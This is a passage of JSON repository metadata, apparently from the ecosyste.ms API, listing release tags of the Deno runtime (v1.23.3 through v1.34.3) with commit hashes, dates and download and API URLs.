"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"